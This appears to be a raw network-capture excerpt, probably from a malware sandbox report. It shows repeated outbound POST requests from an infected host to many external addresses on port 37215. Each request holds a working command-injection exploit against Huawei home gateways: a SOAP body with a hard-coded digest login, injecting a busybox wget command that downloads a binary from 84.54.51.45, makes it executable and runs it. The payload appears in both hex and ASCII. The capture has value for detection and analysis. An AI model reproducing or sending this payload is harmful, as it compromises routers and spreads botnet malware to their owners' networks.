                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            987192.168.2.154649241.253.135.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.747111082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            988192.168.2.154556041.10.119.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911250114 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            989192.168.2.155450641.118.117.21137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911254883 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            990192.168.2.154368041.81.210.16437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911331892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            991192.168.2.154057241.35.84.21737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911333084 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            992192.168.2.153479841.219.249.3837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911353111 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            993192.168.2.155552641.124.141.23737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911374092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            994192.168.2.154771441.23.139.9237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911438942 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            995192.168.2.153819241.5.62.14237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911520958 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            996192.168.2.153492641.137.234.1537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.911520958 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
